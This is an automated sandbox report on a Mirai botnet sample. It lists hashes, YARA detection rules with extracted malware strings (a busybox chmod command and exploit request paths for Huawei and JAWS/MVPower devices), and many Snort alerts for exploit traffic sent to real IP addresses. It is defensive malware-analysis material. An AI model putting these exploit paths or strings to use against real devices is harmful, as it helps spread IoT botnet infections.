Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
1XUdzc3d3i

Overview

General Information

Sample Name:1XUdzc3d3i
Analysis ID:593596
MD5:0d6ec05db10f19ae04e6a9d78feacbe7
SHA1:b1150a9a3aa559984a0f02cd1dbd323942b2c750
SHA256:591cf7deefbe54bdeedcddb1825fab90dcced062f419db0663f167b2c61b7b64
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:593596
Start date and time:2022-03-21 19:06:46 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 23s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:1XUdzc3d3i
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/0@1942/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/1XUdzc3d3i
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
wow deathnet really slaps right?
Standard Error:
  • system is lnxubuntu20
  • 1XUdzc3d3i (PID: 5221, Parent: 5118, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/1XUdzc3d3i
  • wrapper-2.0 (PID: 5239, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5240, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5241, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5244, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5245, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5246, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • cleanup
SourceRuleDescriptionAuthorStrings
1XUdzc3d3iSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x18c80:$xo1: Ik~mhhe+1*4
  • 0x18cf0:$xo1: Ik~mhhe+1*4
  • 0x18d60:$xo1: Ik~mhhe+1*4
  • 0x18dd0:$xo1: Ik~mhhe+1*4
  • 0x18e40:$xo1: Ik~mhhe+1*4
  • 0x190c0:$xo1: Ik~mhhe+1*4
  • 0x19118:$xo1: Ik~mhhe+1*4
  • 0x19170:$xo1: Ik~mhhe+1*4
  • 0x191c8:$xo1: Ik~mhhe+1*4
  • 0x19220:$xo1: Ik~mhhe+1*4
1XUdzc3d3iMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
  • 0x18345:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x180a8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  • 0x17890:$s3: POST /cdn-cgi/
1XUdzc3d3iMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x17890:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
1XUdzc3d3iJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    1XUdzc3d3iJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
        SourceRuleDescriptionAuthorStrings
        5228.1.00000000594e0e6b.000000004a73cece.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x3e4:$xo1: Ik~mhhe+1*4
        • 0x458:$xo1: Ik~mhhe+1*4
        • 0x4cc:$xo1: Ik~mhhe+1*4
        • 0x540:$xo1: Ik~mhhe+1*4
        • 0x5b4:$xo1: Ik~mhhe+1*4
        • 0x834:$xo1: Ik~mhhe+1*4
        • 0x88c:$xo1: Ik~mhhe+1*4
        • 0x8e4:$xo1: Ik~mhhe+1*4
        • 0x93c:$xo1: Ik~mhhe+1*4
        • 0x994:$xo1: Ik~mhhe+1*4
        5221.1.00000000594e0e6b.000000004a73cece.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x3e4:$xo1: Ik~mhhe+1*4
        • 0x458:$xo1: Ik~mhhe+1*4
        • 0x4cc:$xo1: Ik~mhhe+1*4
        • 0x540:$xo1: Ik~mhhe+1*4
        • 0x5b4:$xo1: Ik~mhhe+1*4
        • 0x834:$xo1: Ik~mhhe+1*4
        • 0x88c:$xo1: Ik~mhhe+1*4
        • 0x8e4:$xo1: Ik~mhhe+1*4
        • 0x93c:$xo1: Ik~mhhe+1*4
        • 0x994:$xo1: Ik~mhhe+1*4
        5221.1.00000000ca7ae29e.00000000594e0e6b.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0xc0:$xo1: Ik~mhhe+1*4
        • 0x118:$xo1: Ik~mhhe+1*4
        • 0x170:$xo1: Ik~mhhe+1*4
        • 0x1c8:$xo1: Ik~mhhe+1*4
        • 0x220:$xo1: Ik~mhhe+1*4
        5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x18c80:$xo1: Ik~mhhe+1*4
        • 0x18cf0:$xo1: Ik~mhhe+1*4
        • 0x18d60:$xo1: Ik~mhhe+1*4
        • 0x18dd0:$xo1: Ik~mhhe+1*4
        • 0x18e40:$xo1: Ik~mhhe+1*4
        • 0x190c0:$xo1: Ik~mhhe+1*4
        • 0x19118:$xo1: Ik~mhhe+1*4
        • 0x19170:$xo1: Ik~mhhe+1*4
        • 0x191c8:$xo1: Ik~mhhe+1*4
        • 0x19220:$xo1: Ik~mhhe+1*4
        5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
        • 0x18345:$x2: /bin/busybox chmod 777 * /tmp/
        • 0x180a8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        • 0x17890:$s3: POST /cdn-cgi/
        Click to see the 11 entries

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1XUdzc3d3iVirustotal: Detection: 53%Perma Link
        Source: 1XUdzc3d3iReversingLabs: Detection: 47%

        Networking

        barindex
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39272 -> 95.179.253.116:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60132 -> 23.193.19.60:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.193.19.60:80 -> 192.168.2.23:60132
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60132 -> 23.193.19.60:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35736 -> 52.214.241.81:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35736 -> 52.214.241.81:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37398 -> 206.221.147.206:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59764 -> 45.199.231.76:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59500 -> 96.7.185.20:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44540 -> 154.219.75.106:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38526 -> 154.222.20.120:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38904 -> 156.235.144.144:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59764 -> 45.199.231.76:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.7.185.20:80 -> 192.168.2.23:59500
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52066 -> 86.17.6.48:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34582 -> 34.107.208.101:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54676 -> 212.85.117.43:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54676 -> 212.85.117.43:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33338 -> 109.95.212.96:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55712 -> 162.220.116.42:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42190 -> 162.144.122.14:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52114 -> 34.102.206.194:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59122 -> 104.207.233.22:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34290 -> 150.238.95.184:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50828 -> 123.129.196.44:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55712 -> 162.220.116.42:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42190 -> 162.144.122.14:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59122 -> 104.207.233.22:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52610 -> 69.244.195.219:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55534 -> 93.104.214.68:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46520 -> 101.62.192.162:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50536 -> 23.216.102.203:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 101.62.192.162:80 -> 192.168.2.23:46520
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.216.102.203:80 -> 192.168.2.23:50536
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40630 -> 13.35.17.197:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53918 -> 125.228.239.140:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33892 -> 182.239.52.39:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40630 -> 13.35.17.197:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57586 -> 202.61.183.71:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41354 -> 54.36.229.96:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42234 -> 104.110.223.9:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52292 -> 185.26.121.133:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35984 -> 209.237.181.75:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36056 -> 23.41.248.213:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45974 -> 111.67.203.99:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37462 -> 154.205.192.145:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.223.9:80 -> 192.168.2.23:42234
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.41.248.213:80 -> 192.168.2.23:36056
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52842 -> 156.232.91.121:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37462 -> 154.205.192.145:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54398 -> 104.95.45.248:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.95.45.248:80 -> 192.168.2.23:54398
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54398 -> 104.95.45.248:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55228 -> 23.77.30.117:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56298 -> 156.242.240.153:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43266 -> 156.214.241.43:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33216 -> 172.65.131.255:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43512 -> 52.166.139.244:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36380 -> 185.195.15.194:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33216 -> 172.65.131.255:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53784 -> 104.155.101.173:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36380 -> 185.195.15.194:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53784 -> 104.155.101.173:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43266 -> 156.214.241.43:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60972 -> 142.93.112.117:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59022 -> 104.117.38.184:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.77.30.117:80 -> 192.168.2.23:55228
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.117.38.184:80 -> 192.168.2.23:59022
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45864 -> 104.86.171.80:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50760 -> 18.142.132.94:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.86.171.80:80 -> 192.168.2.23:45864
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45864 -> 104.86.171.80:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50760 -> 18.142.132.94:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45606 -> 77.43.38.123:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42614 -> 77.78.12.76:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44586 -> 34.98.73.70:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48690 -> 45.91.136.107:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42614 -> 77.78.12.76:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34306 -> 92.245.150.234:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48690 -> 45.91.136.107:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41296 -> 50.238.240.2:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58102 -> 92.223.56.105:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44162 -> 47.96.169.121:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53534 -> 35.174.20.191:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56654 -> 34.201.39.193:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41296 -> 50.238.240.2:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53534 -> 35.174.20.191:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46582 -> 164.160.177.132:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34776 -> 104.24.90.152:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34776 -> 104.24.90.152:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37628 -> 81.2.197.102:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35138 -> 195.164.132.22:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41022 -> 107.162.233.118:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42520 -> 23.250.31.67:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36958 -> 107.172.62.126:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41022 -> 107.162.233.118:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.250.31.67:80 -> 192.168.2.23:42520
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50152 -> 154.219.73.114:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41464 -> 104.87.215.226:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33014 -> 210.102.138.80:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.87.215.226:80 -> 192.168.2.23:41464
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41464 -> 104.87.215.226:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50152 -> 154.219.73.114:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:59608
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49204 -> 52.28.177.234:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44926 -> 34.149.55.100:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47046 -> 35.156.102.34:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47046 -> 35.156.102.34:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58664 -> 20.54.95.27:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37582 -> 64.64.7.146:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58664 -> 20.54.95.27:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35462 -> 147.0.243.55:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55946 -> 104.17.53.223:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37592 -> 173.254.72.185:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58446 -> 104.24.240.255:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39980 -> 130.107.255.119:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58446 -> 104.24.240.255:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55946 -> 104.17.53.223:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39982 -> 130.107.255.119:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37582 -> 64.64.7.146:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56596 -> 81.31.49.175:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50738 -> 104.110.81.57:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37592 -> 173.254.72.185:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59898 -> 38.40.218.142:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39980 -> 130.107.255.119:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39982 -> 130.107.255.119:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34500 -> 23.204.232.134:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53064 -> 162.241.171.22:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57580 -> 39.101.171.253:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.204.232.134:80 -> 192.168.2.23:34500
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53064 -> 162.241.171.22:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59898 -> 38.40.218.142:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47182 -> 201.148.210.70:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.81.57:80 -> 192.168.2.23:50738
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50738 -> 104.110.81.57:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47182 -> 201.148.210.70:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:33138
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:33138
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36768 -> 46.229.47.139:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38140 -> 23.72.244.123:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36768 -> 46.229.47.139:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51290 -> 5.255.68.229:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40998 -> 188.39.82.107:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.244.123:80 -> 192.168.2.23:38140
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38140 -> 23.72.244.123:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33920 -> 77.248.91.198:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55252 -> 132.174.253.161:80
